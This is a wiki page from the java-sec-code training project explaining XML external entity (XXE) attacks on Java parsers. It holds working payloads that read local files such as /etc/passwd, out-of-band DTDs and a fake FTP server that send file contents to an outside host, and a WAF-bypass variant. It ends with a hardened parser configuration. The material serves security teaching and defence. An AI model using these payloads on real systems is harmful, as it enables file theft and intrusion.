XXE · JoyChou93/java-sec-code Wiki · GitHub
XXE
JoyChou edited this page Feb 7, 2023 · 4 revisions
Normal XML parsing:
POST /xxe/DocumentBuilder HTTP/1.1
Host: 127.0.0.1:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,de;q=0.7,fr;q=0.6,da;q=0.5,mt;q=0.4
Connection: close
Content-Type: application/xml
Content-Length: 170
<?xml version="1.0" encoding="UTF-8"?>
<book id="1">
<name>Good Job</name>
<author>JoyChou</author>
<year>2017</year>
<price>100.00</price>
</book>
Response:
name: Good Job
author: JoyChou
year: 2017
price: 100.00
Reading a file via the file protocol:
POST /xxe/DocumentBuilder_return HTTP/1.1
Host: 127.0.0.1:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,de;q=0.7,fr;q=0.6,da;q=0.5,mt;q=0.4
Connection: close
Content-Type: application/xml
Content-Length: 133
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE joychou [
<!ENTITY xxe SYSTEM "file:///tmp/1.txt">
]>
<root>&xxe;</root>
Response:
#text: 1111
~!@#%^%'">
2222
➜ cat 1.txt
1111
~!@#%^%'">
2222
In XML elements, "<" and "&" are illegal. "<" produces an error because the parser interprets it as the start of a new element; "&" produces an error because the parser interprets it as the start of a character entity.
Script code can be declared as CDATA. Everything inside a CDATA section is ignored by the parser. A CDATA section starts with "<![CDATA[" and ends with "]]>". For the concrete technique see the article https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/. But when I tested with CDATA, I did not manage to read "<" and "&" successfully. The payloads are as follows:
-------------------------------------------------------------
post data:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///tmp/1.txt">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "https://test.joychou.org/cdata.dtd">
%dtd;
]>
<root>&all;</root>
cdata.dtd:
<!ENTITY all "%start;%stuff;%end;">
-------------------------------------------------------------
post data:
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "https://test.joychou.org/cdata.dtd">
%dtd;
%all;
]>
<data>&fileContents;</data>
cdata.dtd:
<!ENTITY % file SYSTEM "file:///tmp/1.xt">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
-------------------------------------------------------------
In this XXE vulnerable code, the Content-Type must be set to application/xml, otherwise the server side does not receive the body content.
POST /xxe/DocumentBuilder HTTP/1.1
Host: 127.0.0.1:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,de;q=0.7,fr;q=0.6,da;q=0.5,mt;q=0.4
Connection: close
Content-Type: application/xml
Content-Length: 79
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "https://test.joychou.org/evil.dtd">
Payloads:
- Without the ENTITY keyword; can be used to bypass a WAF
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "https://test.joychou.org/evil.dtd">
- With the ENTITY keyword; may be blocked by a WAF
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY % remote SYSTEM "https://test.joychou.org/evil.dtd">%remote;]>
<root/>
evil.dtd code:
http protocol:
<!ENTITY % data SYSTEM "file:///tmp/x">
<!ENTITY % payload "<!ENTITY % send SYSTEM 'https://test.joychou.org/?data=%data;'>">
%payload;
%send;
ftp protocol:
<!ENTITY % data SYSTEM "file:///etc/redhat-release">
<!ENTITY % payload "<!ENTITY % send SYSTEM 'ftp://fakeuser:fakepass@test.joychou.org:2121/%data;'>">
%payload;
%send;
Alternatively, place %payload; in the FTP username or password. If the FTP URL carries no username or password, ftp://test.joychou.org:2121/%payload;, the FTP server receives the Java version:
New client connected
< USER anonymous
< PASS Java1.8.0_121@
< TYPE I
< EPSV ALL
< EPSV
< EPRT |1|172.17.29.150|60731|
< RETR test
< xxe
< ftp
FTP server code:
require 'socket'

# Minimal fake FTP server: answers the USER/PASS handshake and keeps replying
# so the Java client keeps sending its next command, which is printed.
server = TCPServer.new 2121
loop do
  Thread.start(server.accept) do |client|
    puts "New client connected"
    client.puts("220 xxe-ftp-server")
    loop {
      req = client.gets()
      break if req.nil?   # client closed the connection; gets returns nil
      puts "< " + req
      if req.include? "USER"
        client.puts("331 password please - version check")
      else
        #puts "> 230 more data please!"
        client.puts("230 more data please!")
      end
    }
    client.close
  end
end
Test results (CentOS):
Java version | Can read newlines | Characters that truncate | Other characters that cause errors (nothing can be read) | Characters replaced with a newline
---|---|---|---|---
1.7.0_80 | Yes | # ? | % & ' | /
1.8.0_121 | Yes | # ? | % & ' | /
1.8.0_181 | No | # ? | % & ' | /
There may be other characters and other Java versions that were not tested. But my guess is that starting from some 1.8 release, Java can no longer read newlines. I did not test which version that starts with; it is enough to know about this behaviour :-)
Update, 22 Aug 2018: added XXE vulnerable code that supports XInclude; see the code for details.
POC:
<?xml version="1.0" ?>
<root xmlns:xi="https://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/passwd" parse="text"/>
</root>
For details see 浅析xml之xinclude & xslt (A brief analysis of XInclude & XSLT in XML).
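As an added defensive example (not code from the java-sec-code project): a hardened DocumentBuilderFactory configuration that rejects every payload shown on this page, since each of them relies on either a DOCTYPE (the file, CDATA and out-of-band http/ftp variants all need entity declarations) or on XInclude processing. The class name SafeXmlParse and the two sample request bodies are constructed for illustration.

```java
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import java.io.StringReader;

public class SafeXmlParse {

    // Hardened factory (constructed example): no DOCTYPE, no external entities, no XInclude.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject any <!DOCTYPE ...> outright, so no entity declaration is ever processed.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that do not honour the DOCTYPE feature.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        // The XInclude POC above only works when the factory is XInclude-aware.
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Parses a request body; returns the root element name, or throws on DOCTYPE/XInclude.
    static String parseBody(String body) throws Exception {
        DocumentBuilder db = hardenedFactory().newDocumentBuilder();
        Document doc = db.parse(new InputSource(new StringReader(body)));
        return doc.getDocumentElement().getTagName();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample inputs mirroring the requests shown on this page.
        String benign = "<?xml version=\"1.0\"?><book id=\"1\"><name>Good Job</name></book>";
        String xxe = "<?xml version=\"1.0\"?><!DOCTYPE joychou [<!ENTITY xxe SYSTEM "
                + "\"file:///tmp/1.txt\">]><root>&xxe;</root>";
        System.out.println("benign root: " + parseBody(benign));
        try {
            parseBody(xxe);
        } catch (SAXParseException e) {
            // Expected: the parser refuses the DOCTYPE before any entity is resolved.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same feature set is what the WAF bypass on this page cannot get around: the parser never reaches entity resolution, regardless of whether the ENTITY keyword appears in the request or only in a remote DTD.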